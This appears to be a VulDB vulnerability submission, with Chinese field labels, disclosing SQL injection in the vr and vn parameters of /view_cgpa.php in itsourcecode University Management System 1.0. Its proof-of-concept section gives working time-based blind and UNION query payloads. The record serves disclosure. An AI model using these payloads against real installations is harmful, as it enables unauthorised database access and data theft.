| 标题 | itsourcecode University Management System 1.0 SQL Injection |
|---|
| 描述 | Download Source Code: https://itsourcecode.com/wp-content/uploads/2022/01/University-Management-System-Project-In-PHP-Source-Code.zip
log in with a admin account, and in the student account's backend, visit "/view_cgpa.php". This page can accept two parameters, VR and VN, both of which can lead to SQL injection attacks.Parameter: vr (POST)
-----------------POC
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: vr=123321' AND (SELECT 6610 FROM (SELECT(SLEEP(5)))DIfN) AND 'OIeq'='OIeq&vn=mirage
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: vr=123321' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706271,0x614b42746d4946444c726d734d695a52654d4a5676534344787557687076666b756f73726b727155,0x7176626271),NULL-- -&vn=mirage
<img width="1664" alt="image" src="https://github.com/user-attachments/assets/a38374ae-a71a-4ab7-b742-625fcaa963a8"> |
|---|
| 来源 | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE6-2.md |
|---|
| 用户 | Dee.Mirage (UID 71702) |
|---|
| 提交 | 2024-07-20 08時27分 (2 年前) |
|---|
| 管理 | 2024-07-20 16時38分 (8 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 272078 [itsourcecode University Management System 1.0 /view_cgpa.php VR/VN SQL注入] |
|---|
| 积分 | 20 |
|---|